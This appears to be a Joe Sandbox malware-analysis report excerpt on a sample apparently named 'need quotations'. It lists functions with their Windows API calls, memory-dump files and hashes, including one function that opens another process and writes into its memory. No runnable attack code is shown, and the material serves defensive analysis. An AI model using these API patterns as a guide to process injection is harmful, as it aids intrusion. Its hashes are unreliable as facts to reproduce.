CLSIDFromProgID.OLE32 ref: 00279ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00279AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00279B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00279B15
CLSIDFromString.OLE32(?,?), ref: 00279B21

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: d5e644f3ea2f33f21b3cecf82b5f6a7c6f0bb4709ebb4287cb98fcaa704053de
Instruction ID: 8f23a41672aea36668f87d843a8f8da5d09d0aa453e0ffa73ef1af0046cb6677
Opcode Fuzzy Hash: d5e644f3ea2f33f21b3cecf82b5f6a7c6f0bb4709ebb4287cb98fcaa704053de
Instruction Fuzzy Hash: C5014F76610215BFDB118F68ED48F9ABAEDEB44755F148038F909D2210D770DD919BA0

Function 0027AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0027AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0027AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0027AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0027AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0027AAAF

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5cc25c30b3c66913e22e134febb585bd971a60e4f0c251d8dff865ac4fe62aad
Instruction ID: 1a12dbd135dace18cc284fca956fda5c74e2afa467a5413d364e93e07d4c0b9d
Opcode Fuzzy Hash: 5cc25c30b3c66913e22e134febb585bd971a60e4f0c251d8dff865ac4fe62aad
Instruction Fuzzy Hash: EEF0AF352012056FEB101FA4AC8CE6B3BBCFF89764F004029F909C7190DA709C12CB61

Function 0027AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0027AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0027AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0027AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0027AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0027AB10

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 6159cc7d88c5d26f5edf1c4c110a3e03b9b66922c4854664c86e4db7b289884e
Instruction ID: cd84d8d3bd42ee4b9fad9f86b96332d8ea15071dc8fb9d5656d8f4a5dfb30fd2
Opcode Fuzzy Hash: 6159cc7d88c5d26f5edf1c4c110a3e03b9b66922c4854664c86e4db7b289884e
Instruction Fuzzy Hash: EAF04F752112096FEB110FA5FC88E6B3B6DFF85768F004039F949C7190CA7098129A61

Function 0027EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0027EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0027ECAB
MessageBeep.USER32(00000000), ref: 0027ECC3
KillTimer.USER32(?,0000040A), ref: 0027ECDF
EndDialog.USER32(?,00000001), ref: 0027ECF9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: bfd308dcfc103fba4cf31a56f1f3d91de501a61dccdd18f424cd884c7d815f0c
Instruction ID: 08cd0194707a26e8ac0843d6f1488c1aec34ab591daaabcc2f624a21c4cfbf10
Opcode Fuzzy Hash: bfd308dcfc103fba4cf31a56f1f3d91de501a61dccdd18f424cd884c7d815f0c
Instruction Fuzzy Hash: E301D134510705ABEF255F10EE4EF9677BCFB04B05F0145AEB686A10E0DBF0AA64CB90

Function 0025B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0025B0BA
StrokeAndFillPath.GDI32(?,?,002BE680,00000000,?,?,?), ref: 0025B0D6
SelectObject.GDI32(?,00000000), ref: 0025B0E9
DeleteObject.GDI32 ref: 0025B0FC
StrokePath.GDI32(?), ref: 0025B117

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: b7bc17d4cc189fc0a7ab63cfb6ffffdbd02e16cd2a069c47740b3bd0ef2c3b0a
Instruction ID: 58bc7398810408e9bc6538b80337a95aa825fb91cbd1b207a09034729136aa33
Opcode Fuzzy Hash: b7bc17d4cc189fc0a7ab63cfb6ffffdbd02e16cd2a069c47740b3bd0ef2c3b0a
Instruction Fuzzy Hash: F8F0C930011649EFDB239F69EC1DB553BA9A710362F088326FC29550F0C7729969DF54

Function 0028F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0028F2DA
CoCreateInstance.OLE32(002CDA7C,00000000,00000001,002CD8EC,?), ref: 0028F2F2
CoUninitialize.OLE32 ref: 0028F555

Strings

.lnk, xrefs: 0028F28B, 0028F290, 0028F29E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: cc74177405590c50327bfbf5c88561bbd18d32c909fdaac3fe1896f83a289634
Instruction ID: 5546c768ffa18695218b0efd9f67740caff6de06b2aae4b33a4039dad4fa94b4
Opcode Fuzzy Hash: cc74177405590c50327bfbf5c88561bbd18d32c909fdaac3fe1896f83a289634
Instruction Fuzzy Hash: 7EA16B71114201AFD304EF64C881EABB7ECEF99704F50492DF595972A2EB70EA19CB62

Function 0028E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0024660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002453B1,?,?,002461FF,?,00000000,00000001,00000000), ref: 0024662F

CoInitialize.OLE32(00000000), ref: 0028E85D
CoCreateInstance.OLE32(002CDA7C,00000000,00000001,002CD8EC,?), ref: 0028E876
CoUninitialize.OLE32 ref: 0028E893

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

Strings

.lnk, xrefs: 0028E83B, 0028E84D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 6011208175e772dfa9291139dd9661bd283f8176056d5d631c72cc74ccd077c0
Instruction ID: 256c3313c291e15ac5dcb356df0d28dd0b2b76e51239380ce0600c2bb5d5bee9
Opcode Fuzzy Hash: 6011208175e772dfa9291139dd9661bd283f8176056d5d631c72cc74ccd077c0
Instruction Fuzzy Hash: F9A143396143029FCB14EF14C484D2ABBE5BF89710F158998F99A9B3A2CB31EC55CF81

Function 0026325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002632ED

Part of subcall function 0026E0D0: __87except.LIBCMT ref: 0026E10B

Strings

pow, xrefs: 002632C5, 002632E2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: bca787a861f6f11c22d53d71fbe3fb94bac3fa6d151dbf3cc76345da741e3b45
Instruction ID: 0ca73bdf7d0a73515ac9627f8cc1a90fa858a0ed8ffb28bf6c4fba3813433d55
Opcode Fuzzy Hash: bca787a861f6f11c22d53d71fbe3fb94bac3fa6d151dbf3cc76345da741e3b45
Instruction Fuzzy Hash: B8517B75A39203D6CF11AF14D96137A2B94DB41710F308DA9F8C5822E9DF748EF8AA85

Function 00284606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,002DDC50,?,0000000F,0000000C,00000016,002DDC50,?), ref: 00284645

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 002846C5

Strings

REMOVE, xrefs: 00284676
THIS, xrefs: 00284703

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: a93a8059c5ec32c7abf6d7c9549e90a12c4d23474857812bf97b2851c7ec27e8
Instruction ID: c76afaf3f3ff23e0913b23ca7d1a3155e9cd7e391872d70baa3ec9ba22ff1c03
Opcode Fuzzy Hash: a93a8059c5ec32c7abf6d7c9549e90a12c4d23474857812bf97b2851c7ec27e8
Instruction Fuzzy Hash: BD41B338A2121A9FCF04FF54C881AAEB7B4FF45304F148069E916AB291D734DD65CF40

Function 0027C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0027BC08,?,?,00000034,00000800,?,00000034), ref: 00284335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0027C1D3

Part of subcall function 002842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0027BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00284300

Part of subcall function 0028422F: GetWindowThreadProcessId.USER32(?,?), ref: 0028425A
Part of subcall function 0028422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0027BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0028426A
Part of subcall function 0028422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0027BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00284280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0027C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0027C28D

Strings

@, xrefs: 0027C2A5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 18fbd936d5ee34fdff34b6e6361d00c804e7d4ee9202f70eb1d6ba3d922889a4
Instruction ID: 46ff2596b025b4dc748a009535066a578aa6033e4221e4fc22afe568f1a46076
Opcode Fuzzy Hash: 18fbd936d5ee34fdff34b6e6361d00c804e7d4ee9202f70eb1d6ba3d922889a4
Instruction Fuzzy Hash: A641497690121DBFDB11EFA4CC81AEEB7B8AF09300F108099FA45B7181DA71AE55CF61

Function 002AA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DDC00,00000000,?,?,?,?), ref: 002AA6D8
GetWindowLongW.USER32 ref: 002AA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002AA705

Strings

SysTreeView32, xrefs: 002AA6AA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 158f3fb4f1e6b949d1e3abc8f676d393acf57eb21bdb1a7aa0fedb65ec19fd88
Instruction ID: 44366a2c3f6a533357311d4931100655f1b4e94dad4a6a59e1d42e2311b07fdb
Opcode Fuzzy Hash: 158f3fb4f1e6b949d1e3abc8f676d393acf57eb21bdb1a7aa0fedb65ec19fd88
Instruction Fuzzy Hash: 5931A031120606ABDF258E38DC45BEA77A9EF4A324F244725F975931E0CB70AC60CB54

Function 00295180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00295190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002951C6

Strings

D), xrefs: 0029522E
|, xrefs: 002951B5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D)
API String ID: 1413715105-3727512557
Opcode ID: 4dedf2883841854704f2e785e35d96c429fb7e8d6832448baa2ec4970c90dfd5
Instruction ID: 77270d34e88e5c804dcbd4a3b2a708518aa52d03457574127c2e8bfe45c17add
Opcode Fuzzy Hash: 4dedf2883841854704f2e785e35d96c429fb7e8d6832448baa2ec4970c90dfd5
Instruction Fuzzy Hash: 4A315971D21119ABCF05EFA4CC85AEEBFB8FF14700F100019EC04A6166DB71AA26CFA0

Function 002AA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002AA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002AA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 002AA196

Strings

SysMonthCal32, xrefs: 002AA129

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 86e6aedc2d2c68834015d67d13f38e1e8eb786fbd9ff698310886644f1c1eed8
Instruction ID: 44a9d0be717f9cfe9c5ebdb72b3a2a6731c6efb72786b6d5dd78554955b0da09
Opcode Fuzzy Hash: 86e6aedc2d2c68834015d67d13f38e1e8eb786fbd9ff698310886644f1c1eed8
Instruction Fuzzy Hash: A021AD32520219BBDF119F94CC46FEA3B79EF49714F110214FE59AB1D0DBB5A861CBA0

Function 002AA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002AA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002AA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002AA956

Strings

msctls_updown32, xrefs: 002AA8BB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b7150048b38c6bf6fd1231fb31e4cfcf242766a77a95b085e39ef53930fb2e91
Instruction ID: 87e8b911caeb1eed6b4b1db1a34bf743d51f5edb6685aec121bcdbe6599d96c4
Opcode Fuzzy Hash: b7150048b38c6bf6fd1231fb31e4cfcf242766a77a95b085e39ef53930fb2e91
Instruction Fuzzy Hash: 8921A1B561020AAFEB11DF18DC91D7737ADEF5A3A4B050059FA049B261CB71EC21CB61

Function 002A99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002A9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002A9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002A9A65

Strings

Listbox, xrefs: 002A99FD

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: fd6cfdf4d036346bc3f4a6ef60659ac0a63c4b9a3a9964cea0178c67000727c4
Instruction ID: eeb705d84d5fbbc935173564a6de6f5277da8ec122901534960379fa5299bd6c
Opcode Fuzzy Hash: fd6cfdf4d036346bc3f4a6ef60659ac0a63c4b9a3a9964cea0178c67000727c4
Instruction Fuzzy Hash: 0221A732620119BFDF218F55DC85FBB3BAEEF8A750F118129F95497190CA719C61CBA0

Function 002AA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002AA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002AA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002AA48F

Strings

msctls_trackbar32, xrefs: 002AA444

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 55ce680e12b38ff31b330a0ff4706c763deb569a1b8991b78422913d20d28c94
Instruction ID: 9ec05331b51b4aa26aeaebe654f6c6e959eff54f26e2f102b3b3084e0a54d244
Opcode Fuzzy Hash: 55ce680e12b38ff31b330a0ff4706c763deb569a1b8991b78422913d20d28c94
Instruction Fuzzy Hash: 5111E771220209BFEF205F64CC49FAB3B6DFF89754F014128FA45A6091D7B2E821DB24

Function 00262287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00262350,?), ref: 002622A1
GetProcAddress.KERNEL32(00000000), ref: 002622A8

Strings

combase.dll, xrefs: 0026229C
RoInitialize, xrefs: 00262290

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: c79631b7ea28475f482782aa1ed55e8fe8da03837946c940b4828086a52ee148
Instruction ID: efa6855198e2f797d95d76d60922088d3de243f3e7cd99ab993e9c77d1a9b22c
Opcode Fuzzy Hash: c79631b7ea28475f482782aa1ed55e8fe8da03837946c940b4828086a52ee148
Instruction Fuzzy Hash: 1DE012B8AA1301ABDB695F71FC5EF243A68BB01B16F008039B506E60A0CFB544A4CF08

